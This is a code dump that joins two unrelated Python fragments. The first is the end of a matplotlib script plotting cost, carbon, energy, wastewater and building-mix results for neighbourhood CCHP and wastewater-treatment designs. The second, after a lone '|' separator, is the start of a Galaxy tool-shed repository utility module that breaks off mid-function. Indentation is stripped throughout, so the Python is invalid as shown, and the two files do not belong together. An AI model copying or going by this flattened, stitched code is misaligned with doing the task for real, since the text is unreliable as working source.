plt.scatter(x=(sortedDF[41]/10**3),y=(sortedDF[26]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('LCC_vs_WWater_Demand.png', dpi=400, bbox_inches='tight')
# SCC vs Neighborhood's Total Energy Use
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=(sortedDF[40]),y=(sortedDF[27]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Energy Demand (MWh/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('SCC_vs_Energy_Demand.png', dpi=400, bbox_inches='tight')
# SCC vs Neighborhood's Total WWater Demand
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=(sortedDF[41]/10**3),y=(sortedDF[27]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('SCC_vs_WWater_Demand.png', dpi=400, bbox_inches='tight')
plt.close('all')
#############################################
print('plotting building mix vs neighborhood energy and ww graphs')
# Building Mix vs Neighborhood's Total WWater Demand (integrated)
DFName = 'CCHP+WWT'
bldg_types = ['Res','Off','Com','Ind','Hos','Med','Edu']
colors = ['m','b','c','g','y','orange','r']
columns = list(range(29,36))
plt.figure(figsize=(10,5))
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
for i in range(len(bldg_types)):
plt.scatter(x=(sortedDF[41]/10**3),y=DFs[DFName].iloc[:,columns[i]],
s=0.5, label=bldg_types[i], c=colors[i], alpha=0.5)
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.ylabel('Percent of Total GFA (%)')
plt.ylim(0, 100)
plt.xlim(0,11)
# plt.title('LCC')
plt.legend()
plt.savefig('Bldg_Mix_vs_WWater_Demand_Integ.png', dpi=400, bbox_inches='tight')
# Building Mix vs Neighborhood's Total WWater Demand (Disintegrated)
DFName = 'CCHP|CWWTP'
bldg_types = ['Res','Off','Com','Ind','Hos','Med','Edu']
colors = ['m','b','c','g','y','orange','r']
columns = list(range(29,36))
plt.figure(figsize=(10,5))
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
for i in range(len(bldg_types)):
plt.scatter(x=(sortedDF[41]/10**3),y=DFs[DFName].iloc[:,columns[i]],
s=0.5, label=bldg_types[i], c=colors[i], alpha=0.5)
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.ylabel('Percent of Total GFA (%)')
# plt.title('LCC')
plt.ylim(0, 100)
plt.xlim(0,11)
plt.legend()
plt.savefig('Bldg_Mix_vs_WWater_Demand_Disinteg.png', dpi=400, bbox_inches='tight')
# Building Mix vs Neighborhood's Total Energy Demand (integrated)
DFName = 'CCHP+WWT'
bldg_types = ['Res','Off','Com','Ind','Hos','Med','Edu']
colors = ['m','b','c','g','y','orange','r']
columns = list(range(29,36))
plt.figure(figsize=(10,5))
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
for i in range(len(bldg_types)):
plt.scatter(x=(sortedDF[40]),y=DFs[DFName].iloc[:,columns[i]],
s=0.5, label=bldg_types[i], c=colors[i], alpha=0.5)
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Energy Demand (MWh/$m^2$)')
plt.ylabel('Percent of Total GFA (%)')
# plt.title('LCC')
plt.ylim(0, 100)
plt.xlim(0,1)
plt.legend()
plt.savefig('Bldg_Mix_vs_Energy_Demand_Integ.png', dpi=400, bbox_inches='tight')
# Building Mix vs Neighborhood's Total Energy Demand (Disintegrated)
DFName = 'CCHP|CWWTP'
bldg_types = ['Res','Off','Com','Ind','Hos','Med','Edu']
colors = ['m','b','c','g','y','orange','r']
columns = list(range(29,36))
plt.figure(figsize=(10,5))
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
for i in range(len(bldg_types)):
plt.scatter(x=(sortedDF[40]),y=DFs[DFName].iloc[:,columns[i]],
s=0.5, label=bldg_types[i], c=colors[i], alpha=0.5)
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Energy Demand (MWh/$m^2$)')
plt.ylabel('Percent of Total GFA (%)')
# plt.title('LCC')
plt.ylim(0, 100)
plt.xlim(0,1)
plt.legend()
plt.savefig('Bldg_Mix_vs_Energy_Demand_Disinteg.png', dpi=400, bbox_inches='tight')
plt.close('all')
#############################################
print('plotting Supply type vs total neighborhood energy and ww graphs')
# Total Energy Demand vs CHP
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][21],y=(sortedDF[40]),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'CHP Type')
plt.ylabel(r'Total Energy Demand (MWh/$m^2$)')
plt.legend()
plt.savefig('Total_Energy_vs_CHP.png', dpi=400, bbox_inches='tight')
# Total WWater Demand vs CHP
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][21],y=(sortedDF[41]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'CHP Type')
plt.ylabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.legend()
plt.savefig('Total_WWater_vs_CHP.png', dpi=400, bbox_inches='tight')
# Total Energy Demand vs Chiller
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][22],y=(sortedDF[40]),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'Chiller Type')
plt.ylabel(r'Total Energy Demand (MWh/$m^2$)')
plt.legend()
plt.savefig('Total_Energy_vs_Chiller.png', dpi=400, bbox_inches='tight')
# Total WWater Demand vs Chiller
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][22],y=(sortedDF[41]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'Chiller Type')
plt.ylabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.legend()
plt.savefig('Total_WWater_vs_Chiller.png', dpi=400, bbox_inches='tight')
# Total Energy Demand vs WWT (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][24],y=(sortedDF[40]),s=2, c=colors_rb[DFName])
plt.xlabel(r'WWT Type')
plt.ylabel(r'Total Energy Demand (MWh/$m^2$)')
plt.legend()
plt.savefig('Total_Energy_vs_WWT_Integ.png', dpi=400, bbox_inches='tight')
# Total WWater Demand vs WWT (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][24],y=(sortedDF[41]/10**3), s=2, c=colors_rb[DFName])
plt.xlabel(r'WWT Type')
plt.ylabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.savefig('Total_Wwater_vs_WWT_Integ.png', dpi=400, bbox_inches='tight')
'''
plt.close('all')
#############################################
print('plotting pareto fronts')
# LCC vs CO2
plt.figure(figsize=(10,5))
for DFName in DFNames:
plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][39],label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'LCC (k\$/$m^2$)')
plt.ylabel(r'Lifecycle $CO_{2e}$ (T/$m^2$)')
plt.legend()
plt.savefig('CO2_vs_LCC.png', dpi=400, bbox_inches='tight')
#############################################
# LCC vs SCC
plt.figure(figsize=(10,5))
for DFName in DFNames:
plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][27]/10**3,label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'LCC (k\$/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.legend()
plt.savefig('SCC_vs_LCC.png', dpi=400, bbox_inches='tight')
# LCC vs SCC w Generation-based transparency
plt.figure(figsize=(10,5))
for DFName in DFNames:
alphas = np.linspace(0.1, 1, len(DFs[DFName]))
rgba_colors = np.zeros((len(DFs[DFName]),4))
if DFName == DFNames[0]:
rgba_colors[:,0] = 1.0 # red
else:
rgba_colors[:,2] = 1.0 # blue
rgba_colors[:,3] = alphas
plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][27]/10**3,label=DFName, s=1, c=rgba_colors)
plt.xlabel(r'LCC (k\$/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.legend()
plt.savefig('SCC_vs_LCC_Gen_Colorcoded.png', dpi=400, bbox_inches='tight')
# LCC vs SCC w Generation-based transparency and elite-filtered
plt.figure(figsize=(10,5))
for DFName in DFNames:
DF = DFs[DFName][DFs[DFName][26]/10**3 <= 500]
DF = DF[DFs[DFName][27]/10**3 <= 0.1]
alphas = np.linspace(0.1, 1, len(DF))
rgba_colors = np.zeros((len(DF),4))
if DFName == DFNames[0]:
rgba_colors[:,0] = 1.0 # red
else:
rgba_colors[:,2] = 1.0 # blue
rgba_colors[:,3] = alphas
plt.scatter(x=DF[26]/10**3,y=DF[27]/10**3,label=DFName, s=1, c=rgba_colors)
plt.xlabel(r'LCC (k\$/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.legend()
plt.savefig('SCC_vs_LCC_Gen_Colorcoded_Filtered.png', dpi=400, bbox_inches='tight')
# =============================================================================
# # LCC vs SCC (integrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP+WWT'
# plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][27]/10**3, s=2)
# plt.xlabel(r'LCC (k\$/$m^2$)')
# plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.savefig('SCC_vs_LCC_Integ.png', dpi=400, bbox_inches='tight')
#
#
# # LCC vs SCC (disintegrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP|CWWTP'
# plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][27]/10**3, s=2)
# # (DFs[DFName][0][26]/10**6).plot(label=DFName)
# plt.xlabel(r'LCC (k\$/$m^2$)')
# plt.ylabel(r'SCC (k\$/$m^2$)')
# # plt.title('LCC')
# plt.savefig('SCC_vs_LCC_Disinteg.png', dpi=400, bbox_inches='tight')
#
# =============================================================================
#############################################
print('plotting Supply type vs opt objectives')
print('\n#############################################')
Disinteg_Grpd_by_CHP_meanLCC = DFs[DFNames[0]].groupby(21)[26].mean()
Disnteg_Grpd_by_CHP_medLCC = DFs[DFNames[0]].groupby(21)[26].median()
Disnteg_Grpd_by_CHP_meanSCC = DFs[DFNames[0]].groupby(21)[27].mean()
Disnteg_Grpd_by_CHP_medSCC = DFs[DFNames[0]].groupby(21)[27].median()
Integ_Grpd_by_CHP_meanLCC = DFs[DFNames[1]].groupby(21)[26].mean()
Integ_Grpd_by_CHP_medLCC = DFs[DFNames[1]].groupby(21)[26].median()
Integ_Grpd_by_CHP_meanSCC = DFs[DFNames[1]].groupby(21)[27].mean()
Integ_Grpd_by_CHP_medSCC = DFs[DFNames[1]].groupby(21)[27].median()
items = [Disinteg_Grpd_by_CHP_meanLCC, Disnteg_Grpd_by_CHP_medLCC, Disnteg_Grpd_by_CHP_meanSCC,
Disnteg_Grpd_by_CHP_medSCC, Integ_Grpd_by_CHP_meanLCC, Integ_Grpd_by_CHP_medLCC,
Integ_Grpd_by_CHP_meanSCC, Integ_Grpd_by_CHP_medSCC]
items_names = ['Disinteg_Grpd_by_CHP_meanLCC', 'Disnteg_Grpd_by_CHP_medLCC', 'Disnteg_Grpd_by_CHP_meanSCC',
'Disnteg_Grpd_by_CHP_medSCC', 'Integ_Grpd_by_CHP_meanLCC', 'Integ_Grpd_by_CHP_medLCC',
'Integ_Grpd_by_CHP_meanSCC', 'Integ_Grpd_by_CHP_medSCC']
for i in range(len(items)):
print(items_names[i], items[i])
print('#############################################\n')
# shapes = {DFNames[0]: '+', DFNames[1]: 'x'}
# LCC vs CHP
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=21)
plt.scatter(x=DF[21], y=DF[26]/10**3,label=DFName, s=2, alpha=0.5)#, c=colors_rb[DFName])#, marker=shapes[DFName])
plt.xlabel(r'CHP Type')
plt.xticks(rotation=75)
plt.ylabel(r'LCC (k\$/$m^2$)')
plt.ylim(-5, 500)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('LCC_vs_CHP_disinteg.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('LCC_vs_CHP_integ.png', dpi=400, bbox_inches='tight')
# SCC vs CHP
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=21)
plt.scatter(x=DF[21], y=DF[27]/10**3,label=DFName, s=2, alpha=0.5)#, c=colors_rb[DFName])
plt.xlabel(r'CHP Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('SCC_vs_CHP_disinteg.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('SCC_vs_CHP_integ.png', dpi=400, bbox_inches='tight')
# SCC vs CHP with LCC-oriented transparency
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=21)
DF = DF[(DF[26]<=100) & (DF[27]<=100)]
print('number of indivs plotted: ', len(DF))
alphas = 1.2 - DF[26]/DF[26].max() # Normalized LCCs (lowest LCC: 1; highest LCC: 0)
# alphas = np.linspace(0.1, 1, len(DFs[DFName]))
rgba_colors = np.zeros((len(DF),4))
rgba_colors[:,3] = alphas
plt.scatter(x=DF[21],y=DF[27]/10**3,label=DFName, s=1, c=rgba_colors)
plt.xlabel(r'CHP Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('SCC_vs_CHP_disinteg_colorCoded.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('SCC_vs_CHP_integ_colorCoded.png', dpi=400, bbox_inches='tight')
# =============================================================================
# # LCC vs CHP (integrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP+WWT'
# plt.scatter(x=DFs[DFName][21], y=DFs[DFName][26]/10**3, s=2)
# plt.xlabel(r'CHP Type')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.savefig('LCC_vs_CHP_Integ.png', dpi=400, bbox_inches='tight')
#
#
# # LCC vs CHP (disintegrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP|CWWTP'
# plt.scatter(x=DFs[DFName][21], y=DFs[DFName][26]/10**3, s=2)
# plt.xlabel(r'CHP Type')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.savefig('LCC_vs_CHP_Disinteg.png', dpi=400, bbox_inches='tight')
# =============================================================================
# LCC vs Chiller
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=22)
plt.scatter(x=DF[22], y=DF[26]/10**3,label=DFName, s=2, alpha=0.5)#, c=colors_rb[DFName])
plt.xlabel(r'Chiller Type')
plt.xticks(rotation=75)
plt.ylabel(r'LCC (k\$/$m^2$)')
plt.ylim(-5, 500)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('LCC_vs_Chiller_disinteg.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('LCC_vs_Chiller_integ.png', dpi=400, bbox_inches='tight')
# SCC vs Chiller
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=22)
plt.scatter(x=DF[22], y=DF[27]/10**3,label=DFName, s=2, alpha=0.5)#, c=colors_rb[DFName])
plt.xlabel(r'Chiller Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('SCC_vs_Chiller_disinteg.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('SCC_vs_Chiller_integ.png', dpi=400, bbox_inches='tight')
# SCC vs Chiller with LCC-oriented transparency
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=22)
DF = DF[(DF[26]<=100) & (DF[27]<=0.5)]
print('number of indivs plotted: ', len(DF))
alphas = 1 - DF[26]/DF[26].max() # Normalized LCCs (lowest LCC: 1; highest LCC: 0)
# alphas = np.linspace(0.1, 1, len(DFs[DFName]))
rgba_colors = np.zeros((len(DF),4))
rgba_colors[:,3] = alphas
plt.scatter(x=DF[22],y=DF[27]/10**3,label=DFName, s=1, c=rgba_colors)
plt.xlabel(r'Chiller Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('SCC_vs_Chiller_disinteg_colorCoded.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('SCC_vs_Chiller_integ_colorCoded.png', dpi=400, bbox_inches='tight')
# =============================================================================
# # LCC vs Chiller (integrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP+WWT'
# plt.scatter(x=DFs[DFName][22], y=DFs[DFName][26]/10**3, s=2)
# plt.xlabel(r'Chiller Type')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.savefig('LCC_vs_Chiller_Integ.png', dpi=400, bbox_inches='tight')
#
#
# # LCC vs Chiller (disintegrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP|CWWTP'
# plt.scatter(x=DFs[DFName][22], y=DFs[DFName][26]/10**3, s=2)
# plt.xlabel(r'Chiller Type')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.savefig('LCC_vs_Chiller_Disinteg.png', dpi=400, bbox_inches='tight')
# =============================================================================
# LCC vs WWT (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
DF = DFs[DFName].sort_values(by=24)
plt.scatter(x=DF[24], y=DF[26]/10**3, s=2)#, c=colors_rb[DFName])
plt.xlabel(r'WWT Type')
plt.xticks(rotation=75)
plt.ylabel(r'LCC (k\$/$m^2$)')
plt.ylim(-5, 500)
plt.savefig('LCC_vs_WWT_Integ.png', dpi=400, bbox_inches='tight')
# SCC vs WWT (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
DF = DFs[DFName].sort_values(by=24)
plt.scatter(x=DF[24], y=DF[27]/10**3, s=2)#, c=colors_rb[DFName])
plt.xlabel(r'WWT Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
plt.savefig('SCC_vs_WWT_Integ.png', dpi=400, bbox_inches='tight')
# SCC vs WWT with LCC-oriented transparency (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
DF = DFs[DFName].sort_values(by=24)
DF = DF[(DF[26]<=100) & (DF[27]<=0.5)]
print('number of indivs plotted: ', len(DF))
alphas = 1 - DF[26]/DF[26].max() # Normalized LCCs (lowest LCC: 1; highest LCC: 0)
# alphas = np.linspace(0.1, 1, len(DFs[DFName]))
rgba_colors = np.zeros((len(DF),4))
rgba_colors[:,3] = alphas
plt.scatter(x=DF[24],y=DF[27]/10**3,s=1, c=rgba_colors)
plt.xlabel(r'WWT Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
plt.savefig('SCC_vs_WWT_Integ_colorCoded.png', dpi=400, bbox_inches='tight')
plt.close('all')
#############################################
'''
print('plotting building mix traces')
# Building Mix trace plots
DFName = 'CCHP+WWT'
plt.figure(figsize=(10,5))
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
Num_Individuals = len(DFs[DFName])
cm = plt.get_cmap('rainbow')
ax.set_prop_cycle(color=[cm(1.*i/Num_Individuals) for i in range(Num_Individuals)])#ax.set_color_cycle([cm(1.*i/Num_Individuals) for i in range(Num_Individuals)])
for i in range(Num_Individuals):
ax.plot(['Res','Off','Com','Ind','Hos','Med','Edu'],
DFs[DFName].iloc[i,29:36],linewidth=0.2, alpha=0.5)
ax.set_xlabel('Building-Use')
ax.set_ylabel('Percent of Total GFA (%)')
plt.ylim(0, 100)
fig.savefig('Uses_Integ.png', dpi=400, bbox_inches='tight')
DFName = 'CCHP|CWWTP'
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
Num_Individuals = len(DFs[DFName])
cm = plt.get_cmap('rainbow')
ax.set_prop_cycle(color=[cm(1.*i/Num_Individuals) for i in range(Num_Individuals)])#ax.set_color_cycle([cm(1.*i/Num_Individuals) for i in range(Num_Individuals)])
y_array = np.array(DFs[DFName].iloc[:,29:36])
for i in range(Num_Individuals):
ax.plot(['Res','Off','Com','Ind','Hos','Med','Edu'],
DFs[DFName].iloc[i,29:36],linewidth=0.2, alpha=0.5)
ax.set_xlabel('Building-Use')
ax.set_ylabel('Percent of Total GFA (%)')
plt.ylim(0, 100)
fig.savefig('Uses_Disinteg.png', dpi=400, bbox_inches='tight')
plt.close('all')
'''
|
import logging
import os
import re
import shutil
from urllib.error import HTTPError
from markupsafe import escape
from sqlalchemy import (
and_,
false,
or_,
)
from sqlalchemy.orm import joinedload
from galaxy import util
from galaxy import web
from galaxy.tool_shed.util import basic_util
from galaxy.util.tool_shed import common_util, encoding_util
log = logging.getLogger(__name__)
VALID_REPOSITORYNAME_RE = re.compile(r"^[a-z0-9\_]+$")
def check_for_updates(app, model, repository_id=None):
message = ''
status = 'ok'
if repository_id is None:
success_count = 0
repository_names_not_updated = []
updated_count = 0
for repository in model.context.query(model.ToolShedRepository) \
.filter(model.ToolShedRepository.table.c.deleted == false()):
ok, updated = \
check_or_update_tool_shed_status_for_installed_repository(app, repository)
if ok:
success_count += 1
else:
repository_names_not_updated.append(f'<b>{escape(str(repository.name))}</b>')
if updated:
updated_count += 1
message = "Checked the status in the tool shed for %d repositories. " % success_count
message += "Updated the tool shed status for %d repositories. " % updated_count
if repository_names_not_updated:
message += "Unable to retrieve status from the tool shed for the following repositories:\n"
message += ", ".join(repository_names_not_updated)
else:
repository = get_tool_shed_repository_by_id(app, repository_id)
ok, updated = \
check_or_update_tool_shed_status_for_installed_repository(app, repository)
if ok:
if updated:
message = f"The tool shed status for repository <b>{escape(str(repository.name))}</b> has been updated."
else:
message = f"The status has not changed in the tool shed for repository <b>{escape(str(repository.name))}</b>."
else:
message = f"Unable to retrieve status from the tool shed for repository <b>{escape(str(repository.name))}</b>."
status = 'error'
return message, status
def check_or_update_tool_shed_status_for_installed_repository(app, repository):
updated = False
tool_shed_status_dict = get_tool_shed_status_for_installed_repository(app, repository)
if tool_shed_status_dict:
ok = True
if tool_shed_status_dict != repository.tool_shed_status:
repository.tool_shed_status = tool_shed_status_dict
app.install_model.context.add(repository)
app.install_model.context.flush()
updated = True
else:
ok = False
return ok, updated
def create_or_update_tool_shed_repository(app, name, description, installed_changeset_revision, ctx_rev, repository_clone_url,
status, metadata_dict=None, current_changeset_revision=None, owner='', dist_to_shed=False):
"""
Update a tool shed repository record in the Galaxy database with the new information received.
If a record defined by the received tool shed, repository name and owner does not exist, create
a new record with the received information.
"""
metadata_dict = metadata_dict or {}
# The received value for dist_to_shed will be True if the ToolMigrationManager is installing a repository
# that contains tools or datatypes that used to be in the Galaxy distribution, but have been moved
# to the main Galaxy tool shed.
if current_changeset_revision is None:
# The current_changeset_revision is not passed if a repository is being installed for the first
# time. If a previously installed repository was later uninstalled, this value should be received
# as the value of that change set to which the repository had been updated just prior to it being
# uninstalled.
current_changeset_revision = installed_changeset_revision
context = app.install_model.context
tool_shed = get_tool_shed_from_clone_url(repository_clone_url)
if not owner:
owner = get_repository_owner_from_clone_url(repository_clone_url)
includes_datatypes = 'datatypes' in metadata_dict
if status in [app.install_model.ToolShedRepository.installation_status.DEACTIVATED]:
deleted = True
uninstalled = False
elif status in [app.install_model.ToolShedRepository.installation_status.UNINSTALLED]:
deleted = True
uninstalled = True
else:
deleted = False
uninstalled = False
tool_shed_repository = \
get_installed_repository(app, tool_shed=tool_shed, name=name, owner=owner, installed_changeset_revision=installed_changeset_revision)
if tool_shed_repository:
log.debug("Updating an existing row for repository '%s' in the tool_shed_repository table, status set to '%s'.", name, status)
tool_shed_repository.description = description
tool_shed_repository.changeset_revision = current_changeset_revision
tool_shed_repository.ctx_rev = ctx_rev
tool_shed_repository.metadata_ = metadata_dict
tool_shed_repository.includes_datatypes = includes_datatypes
tool_shed_repository.deleted = deleted
tool_shed_repository.uninstalled = uninstalled
tool_shed_repository.status = status
else:
log.debug("Adding new row for repository '%s' in the tool_shed_repository table, status set to '%s'.", name, status)
tool_shed_repository = \
app.install_model.ToolShedRepository(tool_shed=tool_shed,
name=name,
description=description,
owner=owner,
installed_changeset_revision=installed_changeset_revision,
changeset_revision=current_changeset_revision,
ctx_rev=ctx_rev,
metadata_=metadata_dict,
includes_datatypes=includes_datatypes,
dist_to_shed=dist_to_shed,
deleted=deleted,
uninstalled=uninstalled,
status=status)
context.add(tool_shed_repository)
context.flush()
return tool_shed_repository
def extract_components_from_tuple(repository_components_tuple):
'''Extract the repository components from the provided tuple in a backward-compatible manner.'''
toolshed = repository_components_tuple[0]
name = repository_components_tuple[1]
owner = repository_components_tuple[2]
changeset_revision = repository_components_tuple[3]
components_list = [toolshed, name, owner, changeset_revision]
if len(repository_components_tuple) == 5:
toolshed, name, owner, changeset_revision, prior_installation_required = repository_components_tuple
components_list = [toolshed, name, owner, changeset_revision, prior_installation_required]
elif len(repository_components_tuple) == 6:
toolshed, name, owner, changeset_revision, prior_installation_required, only_if_compiling_contained_td = repository_components_tuple
components_list = [toolshed, name, owner, changeset_revision, prior_installation_required, only_if_compiling_contained_td]
return components_list
def generate_tool_shed_repository_install_dir(repository_clone_url, changeset_revision):
"""
Generate a repository installation directory that guarantees repositories with the same
name will always be installed in different directories. The tool path will be of the form:
<tool shed url>/repos/<repository owner>/<repository name>/<installed changeset revision>
"""
tmp_url = common_util.remove_protocol_and_user_from_clone_url(repository_clone_url)
# Now tmp_url is something like: bx.psu.edu:9009/repos/some_username/column
items = tmp_url.split('/repos/')
tool_shed_url = items[0]
repo_path = items[1]
tool_shed_url = common_util.remove_port_from_tool_shed_url(tool_shed_url)
return '/'.join((tool_shed_url, 'repos', repo_path, changeset_revision))
def get_absolute_path_to_file_in_repository(repo_files_dir, file_name):
"""Return the absolute path to a specified disk file contained in a repository."""
stripped_file_name = basic_util.strip_path(file_name)
file_path = None
for root, _, files in os.walk(repo_files_dir):
if root.find('.hg') < 0:
for name in files:
if name == stripped_file_name:
return os.path.abspath(os.path.join(root, name))
return file_path
def get_ids_of_tool_shed_repositories_being_installed(app, as_string=False):
installing_repository_ids = []
new_status = app.install_model.ToolShedRepository.installation_status.NEW
cloning_status = app.install_model.ToolShedRepository.installation_status.CLONING
setting_tool_versions_status = app.install_model.ToolShedRepository.installation_status.SETTING_TOOL_VERSIONS
installing_dependencies_status = app.install_model.ToolShedRepository.installation_status.INSTALLING_TOOL_DEPENDENCIES
loading_datatypes_status = app.install_model.ToolShedRepository.installation_status.LOADING_PROPRIETARY_DATATYPES
for tool_shed_repository in \
app.install_model.context.query(app.install_model.ToolShedRepository) \
.filter(or_(app.install_model.ToolShedRepository.status == new_status,
app.install_model.ToolShedRepository.status == cloning_status,
app.install_model.ToolShedRepository.status == setting_tool_versions_status,
app.install_model.ToolShedRepository.status == installing_dependencies_status,
app.install_model.ToolShedRepository.status == loading_datatypes_status)):
installing_repository_ids.append(app.security.encode_id(tool_shed_repository.id))
if as_string:
return ','.join(installing_repository_ids)
return installing_repository_ids
def get_installed_repository(app, tool_shed=None, name=None, owner=None, changeset_revision=None, installed_changeset_revision=None, repository_id=None, from_cache=False):
"""
Return a tool shed repository database record defined by the combination of a toolshed, repository name,
repository owner and either current or originally installed changeset_revision.
"""
# We store the port, if one exists, in the database.
tool_shed = common_util.remove_protocol_from_tool_shed_url(tool_shed)
if from_cache:
tsr_cache = getattr(app, 'tool_shed_repository_cache', None)
if tsr_cache:
return app.tool_shed_repository_cache.get_installed_repository(
tool_shed=tool_shed,
name=name,
owner=owner,
installed_changeset_revision=installed_changeset_revision,
changeset_revision=changeset_revision,
repository_id=repository_id
)
query = app.install_model.context.query(app.install_model.ToolShedRepository)
if repository_id:
clause_list = [app.install_model.ToolShedRepository.table.c.id == repository_id]
else:
clause_list = [app.install_model.ToolShedRepository.table.c.tool_shed == tool_shed,
